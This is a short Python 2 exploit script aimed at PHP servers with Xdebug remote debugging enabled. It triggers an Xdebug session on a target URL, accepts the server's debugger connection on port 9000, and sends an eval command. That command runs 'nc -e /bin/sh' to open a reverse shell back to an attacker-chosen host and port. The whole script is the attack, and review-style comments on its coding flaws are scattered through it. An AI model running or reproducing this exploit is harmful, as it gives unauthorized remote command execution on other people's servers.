#!/usr/bin/python | |
import argparse | |
import random | |
import requests | |
import string | |
import socket | |
import sys | |
from threading import Thread | |
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="target url", default=None)
parser.add_argument("--lhost", help="listening host", default=None)
parser.add_argument("--lport", help="listening port", default=None)
args = parser.parse_args()
# All three options are mandatory; argparse's required=True would express the same
# contract without this manual check (and exit with status 2 rather than 0).
# NOTE(review): `is None` is the idiomatic identity test for this comparison.
if args.url == None or args.lhost == None or args.lport == None:
    parser.print_help()
    sys.exit(0)
# Listening socket for the inbound connection accepted further down. It is bound on
# every interface ("0.0.0.0") and the port is the fixed value 9000, not --lport.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("0.0.0.0", 9000))
sock.listen(1)
def generate_junk(num=10):
    """Return a string of *num* random ASCII letters (default 10).

    Letters are drawn independently from string.ascii_letters with the
    non-cryptographic random module; the result is only used as an opaque name.
    """
    return "".join(random.choice(string.ascii_letters) for _ in range(num))
def send_payload():
    """Issue one GET to args.url carrying a random XDEBUG_SESSION_START value.

    Prints whether the server answered 200. `args`, `requests` and
    `generate_junk` are resolved from module scope; nothing is returned.
    """
    session_name = generate_junk()
    response = requests.get(args.url, params={"XDEBUG_SESSION_START": session_name})
    status = "[*] Payload sent." if response.status_code == 200 else "[!] Failed to send payload."
    print(status)
# Run send_payload on a worker thread so this main thread can already be blocked in
# accept() on the listening socket; the request and the accept must overlap.
thread = Thread(target=send_payload)
thread.start()
# Blocks until some client connects to port 9000; `addr` is never inspected, so any
# inbound peer is accepted.
conn, addr = sock.accept()
# Command string built from the --lhost/--lport arguments.
payload = "nc -e /bin/sh %s %s 2>&1" % (args.lhost, args.lport)
php_shell_exec = "base64_encode(shell_exec('%s'))" % payload
# Python 2 only: str.encode("base64") is not available on Python 3 str objects
# (the base64 module is the portable equivalent).
conn.sendall("eval -i 1 -- %s\x00" % php_shell_exec.encode("base64"))
# Only the listening socket is closed here; `conn` is left open.
sock.close()
# Private, name-mangled CPython 2 method; presumably absent on Python 3 — verify.
thread._Thread__stop()
# Python 2 print statement; consistent with the #!/usr/bin/python shebang above.
print "[+] Shell session opened."